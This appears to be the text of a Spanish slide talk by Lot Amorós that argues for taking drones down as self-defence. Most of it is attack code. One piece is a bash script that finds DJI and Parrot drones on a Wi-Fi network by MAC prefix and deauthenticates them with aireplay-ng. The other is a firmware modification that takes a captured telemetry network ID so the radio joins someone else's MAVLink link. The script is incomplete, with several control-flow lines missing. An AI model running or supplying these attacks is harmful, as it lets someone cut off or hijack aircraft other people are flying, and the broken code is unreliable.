¿Y si en lugar de construir drones debemos derribarlos?

Drones vs Humans

Esfera personal

Legítima defensa

“Si para repeler una agresión recurrimos a la violencia, hablaremos de defensa propia o legítima defensa, que implica un previo ataque y supone la ausencia o limitación de responsabilidad por el daño que podamos causar“


# Find and kick drones from a local wireless network.  Requires
# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host.  Put on PC, BeagleBone
# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
# and wear it.
# Save as dronehole.sh, 'chmod +x dronehole.sh' and exec as follows:
#   sudo ./dronehole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.
NIC=$1 # Your wireless NIC
BSSID=$2 # Network BSSID (exhibition, workplace, park)
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not present.
GGMAC='@(60:60:1F*|00:12:1C*|00:26:7E*|90:03:B7*)' # Match against DJI & Parrot drones
POLL=30 # Check every 30 seconds
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
while true;
       for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
              if  $TARGET == $GGMAC 
                      # Audio alert
                      beep -f 1000 -l 500 -n 200 -r 2
                      echo "Dronehole discovered: "$TARGET
                      echo "De-authing..."
                      aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                       echo $TARGET": is not a drone. Leaving alone.."
          echo "None found this round."
          sleep $POLL
airmon-ng stop mon0

MAVLink exploit

(Ataque por telemetría)

// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
goto failed;

// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 4);
/* End of Mod*/

Un gran poder conlleva una gran responsabilidad




¿Y si en lugar de construir drones debemos derribarlos?

By Lot Amorós

¿Y si en lugar de construir drones debemos derribarlos?

  • 795